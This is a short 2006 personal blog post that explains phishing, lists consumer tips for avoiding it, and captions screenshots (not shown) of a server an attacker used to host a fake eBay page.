My Life as an Internet Security Consultant

Thursday, June 22, 2006

What is phishing?

Phishing attacks are fraudulent e-mails that appear to come from authentic online merchants, such as eBay or Pay-Pal, or financial institutions, such as banks or credit unions. When you click on a link in the e-mail, you are redirected to a site that may appear to be the merchant or the bank, but isn't. You can avoid phishing scams:
  • Don't reply to e-mails, or click on links in the body of the e-mail, which asks for your personal or financial information.
  • Never send an e-mail which contains your personal or financial information.
  • Review credit card and bank statements as soon as they arrive.
  • Use anti-virus software and keep it up to date.
  • Don't open or download e-mail attachements unless you are sure they are free of viruses and trojans, and they are from a trusted source.
  • Report suspected phsishing attacks to both the apparent source (i.e the bank or merchant who the e-mail claimed to be from) and the FTC.
Here is the example of phising:

Figure 1.1 This is the real ebay page but the source code is modified for phising.

Figure 1.2 Issuing the command "finger jane" in Unix you can see where the attacker's ip last login.

Figure 1.3 The command "more .bash_history" shows what the attacker's is doing in your box.

Figure 1.4 The directory of the files the attacker is using for phising.

Figure 1.5 The actual files for phising.

Figure 1.6 The source code inside flee.php

Those pictures was sent to me last year by my friend. So be careful to visit untrusted sites!


Post a Comment

<< Home